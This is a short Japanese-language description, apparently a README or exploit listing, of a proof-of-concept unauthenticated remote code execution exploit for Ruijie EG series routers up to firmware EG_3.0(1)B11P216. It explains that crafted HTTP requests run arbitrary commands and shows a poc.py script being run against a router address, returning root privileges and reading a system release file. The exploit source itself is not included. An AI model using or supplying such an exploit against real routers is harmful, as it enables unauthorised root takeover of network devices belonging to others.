
Ruijie EGシリーズルーター(ファームウェア <=EG_3.0(1)B11P216)における未認証リモートコード実行の概念実証エクスプロイト。細工したHTTPリクエストを介して任意のコマンドを実行します。
Ruijie EGシリーズルーターのファームウェア <=EG_3.0(1)B11P216は、不適切なフィルタリングにより、認証されていない攻撃者がリモートで任意のコードを実行することを許可します。
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'